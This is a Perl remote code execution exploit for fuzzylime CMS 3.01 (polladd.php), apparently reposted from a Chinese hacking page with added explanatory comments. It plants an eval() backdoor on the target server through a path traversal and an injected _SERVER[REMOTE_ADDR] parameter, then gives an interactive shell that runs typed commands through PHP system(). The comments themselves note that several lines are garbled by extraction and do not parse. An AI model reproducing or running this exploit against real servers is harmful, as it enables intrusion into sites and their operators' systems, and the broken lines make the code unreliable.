
    fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)


    #!/usr/bin/perl
    #!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!
    # Updated: an earlier revision broke when $cmd was changed between commands; this revision fixes that.
    ##
    ## Fuzzylime 3.01 Remote Code Execution
    ## Credits: real and inphex
    ##
    ## [C:\]# perl ye.pl host /path/
    ## :>id
    ## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
    ##

    use LWP::UserAgent;
    use HTTP::Cookies;
    use Switch;


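    # Target coordinates from the command line: `perl ye.pl host /path/`.
    # The host is given bare (no scheme); "http://" is prepended here and the
    # port is fixed at 80 inside the request descriptor below.  Without both
    # arguments the first stage would be sent to "http://:80/code/polladd.php",
    # so bail out early with a usage line instead.
    die "usage: $0 <host> </path/to/fuzzylime/>\n" unless @ARGV >= 2;
    $host_ = "http://".shift;
    $path_ = shift;
    # The path is concatenated with "code/polladd.php" (and later
    # "code/polls/swear.inc.php"), so it has to end in a slash.
    $path_ .= "/" unless $path_ =~ m{/\z};

    # First-stage request descriptor, consumed by start() below.  Everything
    # under 'options' configures the LWP user agent; everything under
    # 'sending_options' describes the single request to send.  start() stores
    # the response body back into this hash under the key it is called with
    # (222 here).
    $info{'info'} = {
        # Printed once as a banner by start() (it prints element [0] of every
        # top-level entry other than options/sending_options).
        "description" => ["#################################################\nFuzzyLime Remote Code Execution\n#################################################\nreal & inphex\n"],
        "options" =>
        {
            "agent" => "",          # empty => start() falls back to "Mozilla/5.0"
            "proxy" => "",          # empty => no proxy
            # Placeholder pair left in from the framework: start() pushes every
            # entry verbatim onto the UA's default headers, so each request
            # currently carries a literal "key: value" header.  Use [] to drop it.
            "default_headers" => [
                ["key","value"]],
            "timeout" => 2,         # seconds, applied to the LWP user agent
            "cookie" =>
            {
                "cookie" => [""],   # empty => no Cookie header
            },
        },
        "sending_options" =>
        {
            "host" => $host_,
            "path" => $path_."code/polladd.php",
            "port" => 80,
            "method_a" => "REMOTE_CODE_EXECUTION",  # dispatch tag; start() routes it to attack()
            # Each entry is [where, name, value]; 'get' entries become the query
            # string, 'post' entries the request body.  No URL encoding is
            # applied by get_d_p_s(), so the PHP fragment below is sent raw and
            # whatever escaping happens is left to LWP/URI.
            "attack" =>
            {
                # "....//" presumably survives a single "../" strip on the target
                # and resolves to "../swear" — confirm against polladd.php.
                "poll" => ["get","poll","....//swear"],
                "log" => ["get","log","1"],
                # A GET parameter literally named _SERVER[REMOTE_ADDR]; the
                # exploit evidently expects the target to import request
                # variables into $_SERVER (register_globals-style) so this PHP
                # fragment ends up in whatever polladd.php logs, which the
                # second stage then requests as code/polls/swear.inc.php.
                "_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","\";eval(\"\$_POST[cmd]\"); ?>"],
            },
        },
    };

    # Stage one: plant the eval() stub.  The response (if any) is kept under
    # $info{'info'}{222}{'content'} but is not printed here.
    start($info{'info'},222);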

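    # Interactive second stage: each line typed at the ":>" prompt is wrapped in
    # PHP system('...') and POSTed as `cmd` to code/polls/swear.inc.php, where
    # stage one is expected to have planted eval("$_POST[cmd]").  The response
    # body that start() stores under key 221 is echoed back as the command's
    # output.
    while (1) {
        print ":>";
        $cmd = <STDIN>;
        # Stop on EOF (Ctrl-D / closed pipe).  The original looped forever here:
        # an undefined $cmd just produced a stream of empty system('') requests.
        last unless defined $cmd;
        chomp($cmd);
        # $cmd lands inside a PHP single-quoted string; escape the two characters
        # that would otherwise terminate it and turn the payload into a parse error.
        $cmd =~ s/([\\'])/\\$1/g;
        # Same descriptor shape as the first stage, minus the banner, pointed at
        # the planted file and carrying the command in the POST body.
        $info1{'info1'} = {
            "options" => {
                "agent" => "",
                "proxy" => "",
                "default_headers" => [ ["key","value"] ],
                "timeout" => 2,
                "cookie" => { "cookie" => [""], },
            },
            "sending_options" => {
                "host" => $host_,
                "path" => $path_."code/polls/swear.inc.php",
                "port" => 80,
                "method_a" => "REMOTE_CODE_EXECUTION",
                "attack" => {
                    "cmd" => ["post","cmd","system('".$cmd."');"],
                },
            },
        };
        start($info1{'info1'},221);
        print ${$info1{'info1'}}{221}{'content'};
    }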


    # start(\%descriptor, $id): send the one request described by the hash
    # (options + sending_options) and store the response body under
    # $descriptor->{$id}{'content'} for the caller to read back.
    #
    # Everything below works on package globals (the script has no `use strict`),
    # and the named subs that follow share those globals.  They are written inside
    # start()'s braces, but named subs in Perl are package-level regardless of
    # where they appear; the only effect of the nesting is that any of start()'s
    # `my` variables they touch ($ff, $c, $x, ...) bind to the first call's
    # instance ("Variable will not stay shared").
    #
    # NOTE(review): several statements in this listing read `$m  ;`, `$x  ;`,
    # `$jj  ;`, `$h  ;`, `$hh  ;`, `$ii  ;`, `$ppp  ;` and `rindex(...) 2`.  The
    # double space is where a `+` decoded as a blank, i.e. these look like `++`
    # and `+ 2` lost in extraction.  As printed, the bare `$m ;` lines are no-ops
    # and the `rindex(...) 2` lines do not parse — confirm against the original.
    sub start
    {

    $a_ = shift;
    $id = shift;
    $post_dA = "";
    # Flatten the 'attack' entries into "k=v&" strings, one for GET and one
    # for POST (see get_d_p_s below — no URL encoding is applied).
    $get_dA = get_d_p_s("get");
    $post_dA = get_d_p_s("post");

    # Scratch counters.  $c is listed twice in this `my`; $kf, $hp, $cccc and
    # $s (a third argument no caller passes) are never used.
    my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
        $jj = 1;
    $ii = 48;
        $hh = 1;
    $ppp = 0;
    $s = shift;
    $a = "";
    $res_p = "";
    $h = "";
    $ua= "";
    $agent= "";
    $k= "";
    $v= "";
    $get_data= "";
    $post_data= "";
    $header_dA = "";
    # Request coordinates pulled out of the descriptor into globals that
    # attack()/get_data()/post_data() read.
    $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
    $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
    $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
    $method_m = $a_->{'sending_options'}{'method_a'};
    # A fresh user agent per call: timeout from options, proxy only when set,
    # and a default UA string when the descriptor leaves 'agent' empty.
    $ua = LWP::UserAgent->new;
    $ua->timeout($a_->{'options'}{'timeout'});  
    if ($a_->{'options'}{'proxy'}) {
        $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
    }
    $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
    $ua->agent($agent);
    # Bare block; nothing inside is `my`-declared, so it scopes nothing.
    {                                                
    # Banner: for every top-level key other than options/sending_options
    # (i.e. 'description' in the first-stage descriptor) print element [0].
    # The inner loop prints [0] once per element rather than printing $r.
    while (($k,$v) = each(%{$a_}))
    {
    if ($k ne "options" && $k ne "sending_options")
    {
    foreach $r (@{$a_->{$k}})
    {
    print $a_->{$k}[0];
    }
    }
    }


    # Push each [name, value] pair onto the UA's default headers.  $m indexes
    # the list in step with the foreach ($j itself is unused); `$m  ;` is
    # presumably `$m++`.  Note the placeholder ["key","value"] pair in both
    # descriptors goes out verbatim as a "key: value" header.
    foreach $j (@{$a_->{'options'}{'default_headers'}})
    {   
    $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
    $m  ;
    }

    # Optional Cookie header (first element only).
    if ($a_->{'options'}{'cookie'}{'cookie'}[0])
    {         
    $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
    }



    }
    # Dispatch on method_a.  Switch.pm is a source filter (dropped from core
    # in 5.14); every case except SQL_INJECTION_BLIND — and the default —
    # ends up in attack(), so for this script the tag is effectively cosmetic.
    switch ($method_m)        
    {
    case "attack" { &attack();}
    case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
    case "REMOTE_COMMAND_EXECUTION" { &attack();}
    case "REMOTE_CODE_EXECUTION" {&attack();}
    case "REMOTE_FILE_INCLUSION" { &attack();}
    case "LOCAL_FILE_INCLUSION" { &attack(); }
    else { &attack(); }  

    }


    # attack(): send the request described by the globals start() set up and
    # store the response body under $a_->{$id}{'content'}.  POST is used iff
    # any attack entry is tagged "post"; the GET string is always appended to
    # the path as a query string.  If the descriptor carries a 'regex' list
    # under 'attack', each pattern is run against the body and captures $1..$N
    # (N = regex[$h][1]) are saved under $a_->{$id}{'regex'}.  Neither
    # descriptor in this script defines 'regex', so those loops do not run here.
    sub attack
    {
    # These `my`s shadow the globals with undef: $h then indexes element 0,
    # and $jj compares as 0.  `$x  ;`/`$jj  ;`/`$h  ;` presumably `++`.
    my ($jj);
    my ($h);
    my($x);
    if ($post_dA eq "") {
    $method = "get";
    } elsif ($post_dA ne "")
    {
    $method = "post";
    }
    if ($method eq "get") {  
    $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/ if 0; # (see loop below)
    ${$a_}{$id}{'content'} = $res_p;
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    # ${$jj} is a symbolic reference to the capture variable $1, $2, ...;
    # it only works because the script never enables `use strict 'refs'`.
    if (${$jj} ne "")
    {
    ${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
    $x  ;
    }
    $jj  ;
    }

    $h  ;
    }
    } elsif ($method eq "post")
    {
    # Same flow as the GET branch, with the POST string as the body and the
    # content type hard-wired to a form post.
    $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

    ${$a_}{$id}{'content'} = $res_p;

    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne "")
    {
    ${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
    $x  ;
    }
    $jj  ;
    }
    $h  ;
    }
    }

    }
    # sql_injection_blind(): generic blind-extraction driver carried over from
    # the author's framework; not reached by this exploit (method_a is
    # REMOTE_CODE_EXECUTION).  For each position $hh it probes character codes
    # 48..120 through check(); a hit appends chr($ii) to $chr and advances $hh.
    # Progress is redrawn in place with backspaces.  `$hh  ;`/`$ii  ;` are
    # presumably `++`.  After every sweep the running length is pushed to @ffs;
    # the scalar $ffs is never assigned, so the exit test compares
    # ($#ffs - 999) with 0, i.e. the loop gives up after 1000 sweeps and does
    # not stop early when a sweep finds nothing.
    sub sql_injection_blind
    {
    while ()
    {
    while ($ii <= 120)
    {

    $itsx = "[".chr($ii)."]";
    $l = length($itsx);
    $b = ("\b")x$l;
    syswrite STDOUT,$b.$itsx;

    if(check($ii,$hh) == 1)
    {
    syswrite STDOUT,$b.chr($ii)."---";
    $hh  ;
    $chr = $chr.chr($ii);
    }
    $ii  ;
    }
    push(@ffs,length($chr));
    if (($#ffs - 999) == $ffs)
    {
    exit;
    }
    $ii = 48;
    }
    }
    # check($char_code, $position): send one blind probe with the `$i`/`$h`
    # placeholders in the query replaced by the candidate character code and
    # position (see modify()), and return 1 if the response indicates a hit.
    # The ($$) prototype only affects parsing, it validates nothing.
    # GET branch: regex[$h][2] == 1 means "a match is a hit", otherwise a
    # match is a miss; POST branch: a match is always a hit.  Both branches
    # return on the first pattern, so `$h  ;` is unreachable, and an empty
    # regex list falls off the end returning undef.  `$ppp  ;` is presumably a
    # request counter (`$ppp++`).
    sub check($$)
    {
    my ($h);
    my ($a);
    $ii = shift;
    $hh = shift;

    if (get_d_p_s("post") ne "")
    {
    $method = "post";
    } else { $method = "get";}
    if ($method eq "get")
    {
    $ppp  ;
    $query = modify($get_dA,$ii,$hh);
    $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
    return 1;
    } else { return 0;}
    }
    else
    {
    if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
    return 0;
    }else { return 1;}


    }
    $h  ;
    }
    } elsif ($method eq "post")
    {
    $ppp  ;
    $query_g = modify($get_dA,$ii,$hh);
    $query_p = modify($post_dA,$ii,$hh);

    $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
    return 0;
    }
    $h  ;
    }
    }
    }
    # modify($string, $char_code, $position): substitute the literal `$i`
    # placeholder with $char_code and the literal `$h` placeholder with
    # $position.  Each replacement keeps the text before the FIRST occurrence
    # and after the LAST, so several occurrences of a placeholder collapse
    # into one substitution.  The `rindex(...) 2` expressions have to be
    # `rindex(...) + 2` (the two-character placeholder length) to parse; as
    # printed they are syntax errors.
        sub modify($$$)
    {
        $string = shift;
        $replace_by = shift;
        $replace_by1 = shift;

        if ($string !~/\$i/ && $string !~/\$h/) {
        return $string;
            } elsif ($string !~/\$i/)
    {
            $ff = substr($string,0,index($string,"\$h"));
                $ee =  substr($string,rindex($string,"\$h") 2);
                $string = $ff.$replace_by1.$ee;

                return $string;
    } elsif ($string !~/\$h/)
    {
            $f = substr($string,0,index($string,"\$i"));
            $e = substr($string,rindex($string,"\$i") 2);
            $string = $f.$replace_by.$e;
        return $string;
    } else
    {
        $f = substr($string,0,index($string,"\$i"));
            $e = substr($string,rindex($string,"\$i") 2);
            $string = $f.$replace_by.$e;

        $ff = substr($string,0,index($string,"\$h"));
            $ee =  substr($string,rindex($string,"\$h") 2);
            $string = $ff.$replace_by1.$ee;

        return $string;
    }
    }
    # get_d_p_s("get" | "post" | "header"): walk the descriptor's 'attack'
    # entries ([where, name, value]) and return the "name=value&" string for the
    # requested kind, or for "header" the name => value hash as a list.
    # Values are concatenated raw — nothing is URL-encoded — so the PHP payload
    # in the first stage is sent exactly as written and any escaping is left to
    # LWP/URI.  %header_dA here is a hash, distinct from the scalar $header_dA
    # zeroed in start().  The trailing `@a_ = ();` is unreachable.
    sub get_d_p_s
    {
    $k = 0;
    $v = 0;
    $g_d_p_s = shift;

    @post = ();
    @get = ();

    $post_data = "";
    $get_data = "";
    $header_data = "";
    %header_dA = ();
    $p = "";
    $g = "";
    while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
    {
    if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
    {
    $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
    } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
    $g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
    } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
    {
            $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
    }
    }
    if ($g_d_p_s eq "get")
    {
    return $g;
    }
    elsif ($g_d_p_s eq "post")
    {
    return $p;
    } elsif ($g_d_p_s eq "header")
    {
    return %header_dA;
    }

    @a_ = ();
    }
    # get_data($host, $path_with_query): GET "$host:$port$path" and return the
    # body.  Any "header"-tagged attack entries are pushed onto the UA's default
    # headers on every call, so they accumulate across requests.  $req actually
    # holds the HTTP::Response; the status is never checked, so the caller gets
    # the body of an error page just the same.
    sub get_data
    {
    $h_host_h_xdsjaop = shift;
    $h_path_h_xdsjaop = shift;
    %hash = get_d_p_s("header");
        while (($u,$c) = each(%hash))
    {
    $ua->default_headers->push_header($u => $c);
    }
    $req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
    return $req->content;
    }
    # post_data($host, $path_with_query, $content_type, $body): POST $body to
    # "$host:$port$path" with the given Content-Type and return the response
    # body.  Same header accumulation and missing status check as get_data().
    sub post_data
    {
    $h_host_h_xdsjaop = shift;
    $h_path_h_xdsjaop = shift;
    $content_type = shift;
    $send = shift;
    %hash = get_d_p_s("header");
        while (($u,$c) = each(%hash))
    {
        $ua->default_headers->push_header($u => $c);
    }
    $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
    $req->content_type($content_type);
    $req->content($send);
    $res = $ua->request($req);
    return $res->content;
    }

    }   # end of start()

    来源:https://www.jb51.net/hack/5664.html
